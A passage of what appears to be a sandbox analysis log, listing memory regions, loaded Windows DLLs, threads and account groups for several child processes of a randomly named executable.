monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3343 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3344 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3514 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3515 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3516 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3517 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 3518 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 3519 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 3520 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 3521 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3522 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 3523 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3524 start_va = 0x860000 end_va = 0x9e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000860000" filename = "" Region: id = 3525 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 84 os_tid = 0xab8 Thread: id = 92 os_tid = 0x13e8 Process: id = "10" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0x4c177000" os_pid = "0xf78" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3187 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3188 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3189 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3190 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3191 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3192 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3193 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3194 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3195 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3196 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 3197 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3198 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3199 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3200 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3201 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3202 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 3263 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 3264 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3265 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3266 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3267 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3268 start_va = 0x570000 end_va = 0x7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3285 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3286 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3442 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3443 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3444 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3445 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3446 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3447 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 3448 start_va = 0x570000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3449 start_va = 0x6b0000 end_va = 0x7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3450 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 3451 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3452 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 3453 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 3454 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3455 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3456 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3457 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3458 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3459 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3460 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3461 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3462 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3463 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 3464 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 3643 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 3644 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 3645 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3646 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 3647 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3648 start_va = 0x7b0000 end_va = 0x937fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 3649 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 85 os_tid = 0x1384 Thread: id = 97 os_tid = 0x7ac Process: id = "11" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0x4c17c000" os_pid = "0x1394" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3208 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3209 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3210 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3211 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3212 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3213 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3214 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3215 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3216 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3217 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 3218 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3219 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3220 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3221 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3222 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3223 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 3287 start_va = 0x600000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 3288 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3289 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3306 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3307 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3324 start_va = 0x610000 end_va = 0x86ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3325 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3326 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3491 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3492 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3493 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3494 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3495 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3496 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 3497 start_va = 0x610000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3498 start_va = 0x770000 end_va = 0x86ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 3499 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 3500 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3501 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 3502 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 3503 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3504 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3505 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3506 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3507 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3508 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3509 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3510 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3511 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3512 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 3513 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 3697 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 3698 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 3699 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3700 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 3701 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3702 start_va = 0x870000 end_va = 0x9f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 3703 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 86 os_tid = 0x230 Thread: id = 99 os_tid = 0x5c4 Process: id = "12" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xdad5000" os_pid = "0x1370" os_integrity_level = 